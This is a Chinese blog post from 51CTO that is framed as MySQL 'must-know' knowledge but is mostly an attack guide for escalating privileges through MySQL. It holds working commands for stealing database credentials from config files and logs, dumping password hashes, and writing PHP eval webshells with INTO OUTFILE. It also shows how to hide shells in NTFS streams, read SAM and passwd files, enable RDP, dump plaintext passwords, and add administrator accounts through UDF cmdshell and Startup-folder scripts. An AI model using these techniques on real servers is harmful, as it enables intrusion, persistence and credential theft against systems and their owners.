MySQL“必知必会”的知识点

MySQL“必知必会”的知识点

From-02-16 陈小兵 51CTO博客

MySQL 是一种关联数据库管理系统，关联数据库将数据保存在不同的表中，而不是将所有数据放在一个大仓库内，这样就增加了速度并提高了灵活性。

SQL 语言是访问数据库最常用的标准化语言。MySQL 软件采用了 GPL(GNU 通用公共许可证)，它分为免费版和商业版，由于其体积小、速度快、总体拥有成本低，尤其是开放源码这一特点，一般中小型网站的开发都选择 MySQL 作为网站数据库。由于其免费版的性能卓越，搭配 PHP 和 Apache 可组成良好的开发环境，MySQL 分为商业版本(MySQL Enterprise Edition 和 MySQL Cluster CGE )和 GPL 版本(MySQL Community Edition)（开发版下载地址：/downloads/）。

一

MySQL 提权必备条件

1

服务器安装 MySQL 数据库

利用MySQL提权的前提就是服务器安装了MySQL数据库，且MySQL的服务没有降权，MySQL数据库默认安装是以系统权限继承的，并且需要获取MySQLroot账号密码。

2

判断MySQL服务运行权限

对于MySQL数据库服务运行权限有很多方法，我这里主要介绍三种，一种是通过查看系统账号，也即使用“net user”命令查看系统当前账号，如果出现了MySQL这类用户，以为着系统可能进行了降权，一般情况都不会降权。第二种方法就是看 Mysqld 运行的 Priority 值，如图1所示。通过 aspx 的网页木马来查看 Process 信息，在图中我们可以看到系统权限的 Priority 值为“8 ”，如果Mysqld 的 Priority 值也为 8 则意味着MySQL是以 System 权限运行的。第三种方法是查看端口可否外联，一般情况下是不允许 root 等账号外联，外部直接连接意味着账号可能被截取和嗅探，通过本地客户端直接连接对方服务器，直接查看和操作MySQL数据库，可以通过扫描 3306 端口来判断是否提供对外连接。

查看 Priority 值来判断 Mysqld 服务运行权限

二

Mysql密码获取与破解

1

获取网站数据库账号和密码

对于 CMS 系统，一定会有一个文件定义了数据库连接的用户和密码。例如以下代码：

$db['default']['hostname']='localhost';

$db['default']['username']='root';

$db['default']['password']='123456';

$db['default']['database']='crm';

dedecms 数据库安装的信息就是写在 data/common.inc.php，Discuz 的数据库信息就在 config/config_global_default.php、config /config_ucenter.php、config.inc.php。一般数据库配置文件都会位于 config、application、conn、db等目录，配置文件名称一般会是 conn.asp/php/aspx/jsp 等。对于 java 会在 /WEB-INF/config/config.properties 中配置，总之通过查看源代码，进行层层分析，终究会发现数据库配置文件。

对于 Linux 操作系统，除了上述方法获取 oot 账号密码外，还可以通过查看 ./root/.mysql_history、./root/.bash_history 文件查看MySQL操作涉及的密码。当然对于MySQL5.6 以下版本，由于设计MySQL程序时对于安全性的重视度非常低，用户密码是明文传输。

MySQL对于 binary log 中和用户密码相关的操作是不加密的。如果你向MySQL发送了例如 create user,grant user ... identified by 这样的携带初始明文密码的指令，那么会在 binary log 中原原本本的被还原出来，执行“mysqlbinlog binlog.000001”命令即可获取，如图4所示。

查看 binlog 日志

2

获取 MySQL 数据库 user 表

MySQL所有设置默认都保存在“C:\Program Files\MYSQL\MYSQL Server 5.0\data\MYSQL”中，也就是安装程序的 data 目录下，有关用户一共有三个文件即 user.frm、user.MYD 和 user.MYI，MySQL数据库用户密码都保存在user.MYD 文件中，包括 root 用户和其他用户的密码。

在有权限的情况下，我们可以将 User.frm、user.myd 和 User.myi 三个文件下载到本地，通过本地的MySQL环境直接读取 user 表中的数据。当然也可使用文本编辑器将 user.MYD 打开将 root 账号的密码复制出来到到 进行查询和破解。对于MySQL数据库密码如果通过 等网站不能查询到密码则需要自己手动破解，有关MySQL数据库密码手动破解，请查阅下一章。

3

MySQL密码查询

可以通过以下查询语句直接查询 MySQL数据库中的所有用户和密码，如图2所示。

selectuser,passwordfrommysql.user;

selectuser,passwordfrommysql.userwhereuser='root';

4

MySQL 密码加密算法

MySQL 实际上是使用了两次 SHA1 夹杂一次 unhex 的方式对用户密码进行了加密。具体的算法可以用公式表示：password_str = concat('*', sha1(unhex(sha1(password))))，可以通过查询语句进行验证，查询结果如图3所示。

selectpassword('mypassword'),concat('*',sha1(unhex(sha1('mypassword'))));

图3MySQL数据库加密算法

三

MySQL 获取 webshell

MySQL root 账号网站获取 webshell 具备的条件：

1. 知道站点物理路径，网站物理途径可以通过 phpinfo 函数、登录后台查看系统属性、文件出错信息、查看网站源代码以及路径猜测等方法获取。

2. 有足够大的权限，最好是 root 账号权限或者具备 root 权限的其它账号，可以用 select user,password from mysql.user 进行测试。

3. magic_quotes_gpc()=OFF。对于 PHP magic_quotes_gpc=on 的情况，可以不对输入和输出数据库的字符串数据作 addslashes() 和 stripslashes() 的操作，数据也会正常显示。 对于 PHP magic_quotes_gpc=off 的情况必须使用 addslashes() 对输入数据进行处理，但并不需要使用 stripslashes() 格式化输出，因为 addslashes() 并未将反斜杠一起写入数据库，只是帮助 MySQL 完成了 SQL 语句的执行。

4. 直接导出 webshell，执行下面语句

Select'<?phpeval($_POST[cmd])?>'intooutfile'物理路径';

and1=2unionallselect一句话HEX值intooutfile'路径';

也可以通过创建表来直接完成，其中 d:/www/exehack.php 为 webshell 的名称和路径：

CREATETABLE`mysql`.`darkmoon`(`darkmoon1`TEXTNOTNULL);

INSERTINTO`mysql`.`darkmoon`(`darkmoon1`)VALUES('<?php@eval($_POST[pass]);?>');

SELECT`darkmoon1`FROM`darkmoon`INTOOUTFILE'd:/www/exehack.php';

DROPTABLEIFEXISTS`darkmoon`;

5. 有些情况下掌握了 MSSQL 数据库口令，但服务器环境是 Windows，web 环境是 PHP，则可以通过 SQLTOOLs 工具，直接连接命令，通过以下命令写入shell：

echo^<?php@eval(request[xxx])?^^>^>c:\web\www\shell.php

四

MySQL 渗透有用的一些技巧总结

1

常见的有助于渗透到 MySQL 函数

在对 MySQL 数据库架构的渗透中，MySQL 内置的函数 DATABASE()、USER()、SYSTEM_USER()、SESSION_USER() 和 CURRENT_USER() 可以用来获取一些系统的信息，而 load_file() 作用是读入文件，并将文件内容作为一个字符串返回，这在渗透中尤其有用，例如发现一个 php 的 SQL 注入点，则可以通过构造“-1 union select 1,1,1,1,load_file('c:/boot.ini')”来获取boot.ini文件的内容。

(1) 一些常见的系统配置文件

c:/boot.ini//查看系统版本

c:/windows/php.ini//php配置信息

c:/windows/my.ini//MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码

c:/winnt/php.ini

c:/winnt/my.ini

c:\mysql\data\mysql\user.MYD//存储了mysql.user表中的数据库连接密码

c:\ProgramFiles\\Serv-U\ServUDaemon.ini//存储了虚拟主机网站路径和密码

c:\ProgramFiles\Serv-U\ServUDaemon.ini

c:\windows\system32\inetsrv\MetaBase.xml查看IIS的虚拟主机配置

c:\windows\repair\sam//存储了WINDOWS系统初次安装的密码

c:\ProgramFiles\Serv-U\ServUAdmin.exe//6.0版本以前的serv-u管理员密码存储于此

c:\ProgramFiles\\ServUDaemon.exe

C:\DocumentsandSettings\AllUsers\ApplicationData\Symantec\pcAnywhere\*.cif文件

//存储了pcAnywhere的登陆密码

c:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf或C:\apache\conf\httpd.conf//查看WINDOWS系统apache文件

c:/Resin-3.0.14/conf/resin.conf//查看jsp开发的网站resin文件配置信息.

c:/Resin/conf/resin.conf/usr/local/resin/conf/resin.conf查看linux系统配置的JSP虚拟主机

d:\APACHE\Apache2\conf\httpd.conf

C:\ProgramFiles\mysql\my.ini

C:\mysql\data\mysql\user.MYD存在MYSQL系统中的用户密码

LUNIX/UNIX 下：

/usr/local/app/apache2/conf/httpd.conf//apache2缺省配置文件

/usr/local/apache2/conf/httpd.conf

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf//虚拟网站设置

/usr/local/app/php5/lib/php.ini//PHP相关设置

/etc/sysconfig/iptables//从中得到防火墙规则策略

/etc/httpd/conf/httpd.conf//apache配置文件

/etc/rsyncd.conf//同步程序配置文件

/etc/f//mysql的配置文件

/etc/redhat-release//系统版本

/etc/issue

/etc/

/usr/local/app/php5/lib/php.ini//PHP相关设置

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf//虚拟网站设置

/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf查看linuxAPACHE虚拟主机配置文件

/usr/local/resin-3.0.22/conf/resin.conf针对3.0.22的RESIN配置文件查看

/usr/local/resin-pro-3.0.22/conf/resin.conf同上

/usr/local/app/apache2/conf/extra/httpd-vhosts.confAPASHE虚拟主机查看

/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf查看linuxAPACHE虚拟主机配置文件

/usr/local/resin-3.0.22/conf/resin.conf针对3.0.22的RESIN配置文件查看

/usr/local/resin-pro-3.0.22/conf/resin.conf同上

/usr/local/app/apache2/conf/extra/httpd-vhosts.confAPASHE虚拟主机查看

/etc/sysconfig/iptables查看防火墙策略

load_file(char(47))可以列出FreeBSD,Sunos系统根目录

replace(load_file(0×2F6574632F706173737764),0×3c,0×20)

replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

(2)直接读取配置文件

SELECTLOAD_FILE('/etc/passwd')

SELECTLOAD_FILE('/etc/issues')

SELECTLOAD_FILE('/etc/etc/rc.local')

SELECTLOAD_FILE('/usr/local/apache/conf/httpd.conf')

SELECTLOAD_FILE('/etc/nginx/nginx.conf')

(3) Linux 下通过 load_file 函数读出来的数据库有可能是 hex 编码，要正常查看需要使用 NotePad 将将以上代码全部选中，然后选择插件“Converter”-“HEX-ASCII”进行转换。

2. Windows 下 MySQL 提权时无法创建目录解决办法及数据流隐藏 Webshell

NTFS 中的 ADS (交换数据流)可以建立目录，隐藏 webshell 等等。

(1) MySQL 创建目录

当 MySQL 版本较高时，自定义函数的dll需要放在mysql目录下的lib\plugin\。一般普通的脚本是没有在这个文件夹下创建文件夹的权限的。这里可以用到ads来突破：

select'xxx'intooutfile'D:\\mysql\\lib::$INDEX_ALLOCATION';

会在MySQL目录下生成一个 lib 目录，这样你就可以将你的 udf 放在这个插件目录下了。

(2) 隐藏webshell

在服务器上 echo 一个数据流文件进去，比如 index.php是网页正常文件，我们可以这样子搞：

echo^<?php@eval(request[xxx])?^>>index.php:a.jpg

这样子就生成了一个不可见的 shell a.jpg，常规的文件管理器、type 命令，dir 命令、del 命令发现都找不出那个 a.jpg 的。我们可以在另外一个正常文件里把这个 ADS 文件 include 进去，这样子就可以正常解析我们的一句话了。

3

有用的一些技巧

(1) 3389 端口命令行下获取总结

netstat-an|find"3389"查看3389端口是否开放

tasklist/svc|find"TermService"获取对应TermService的PID号

netstat-ano|find'1340'查看上面获取的PID号对应的TCP端口号

(2) Windows Server 命令行开启 3389

wmic/namespace:\\root\cimv2\terminalservicespathwin32_terminalservicesettingwhere(__CLASS!="")callsetallowtsconnections1

wmic/namespace:\\root\cimv2\terminalservicespathwin32_tsgeneralsettingwhere(TerminalName='RDP-Tcp')callsetuserauthenticationrequired1

regadd"HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer"/v

(3) wce64 -w 命令直接获取系统明文登录密码

(4) 在 phpinfo 中查找 SCRIPT_FILENAME 关键字获取真实路径

(5) Linux 终端提示符下查看 mysql 有关信息，ps -ef|grep mysql

(6) Linux 下启动 mysql 服务：service mysqld start

(7) Linux 下查看 mysqld 是否启动：ps -el | grep mysqld

(8) 查看 mysql 在哪里：whereis mysql

(9) 查询运行文件所在路径 which mysql

(10) udf.dll提权常见函数

cmdshell 执行cmd；

downloader 下载者,到网上下载指定文件并保存到指定目录；

open3389 通用开3389终端服务，可指定端口(不改端口无需重启)；

backshell 反弹Shell；

ProcessView 枚举系统进程；

KillProcess 终止指定进程；

regread 读注册表；

regwrite 写注册表；

shut 关机，注销，重启；

about 说明与帮助函数；

具体用户示例：

selectcmdshell('netuseriis_user123!@#abcABC/add');

selectcmdshell('netlocalgroupadministratorsiis_user/add');

selectcmdshell('regedit/sd:web3389.reg');

selectcmdshell('netstat-an');

4

一些常见的 MySQL 命令

(1) 连接到 mysql 服务器

mysql-h192.168.0.1-uroot-antian365

(2) 查看所有数据库

showdatabases;

(3) 使用某个数据库

usetestdatabase;

(4) 查看数据库中的所有表

showtables;

(5) 在 test 数据库下创建一个新的表

createtablea(cmdtext);

(6) 在表中插入内容添加用户命令

insertintoavalues("setwshshell=createobject(""wscript.shell"")");

nsertintoavalues("a=wshshell.run(""cmd.exe/cnetuser11/add"",0)");

insertintoavalues("b=wshshell.run(""cmd.exe/cnetlocalgroupadministrators1/add"",0)");

(7) 查询 a 表中所有的数据

select*froma

(8) 导出数据到系统某个目录下

select*fromaintooutfile"c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\a.vbs";

(9) 查询数据库数据路径

select@@datadir;

(10) 查看所有 dir 路径

SHOWVARIABLESWHEREVariable_NameLIKE"%dir"

(11) 查看插件路径

showvariableslike'%plugins%';

(12) 查询MySQL安装路径

select@@basedir

(13) 常用内置函数

selectsystem_user()查看系统用户

selectcurrent_user()查询当前用户

selectuser();查询用户

SELECTversion()查询数据库版本

SELECTdatabase()查询当前连接的数据库

select@@version_compile_os查询当前操作系统

selectnow();显示当前时间

(14) 获取表结构

desc表名或者showcolumnsfrom表名

(15) 删除表

droptable<表名>

参考文章：

/hack/41493.html

/blog/hashing-algorithm-in-mysql-password-2/

/Article/html/3/8//75694.htm

/hateislove214/archive//11/05/1869889.html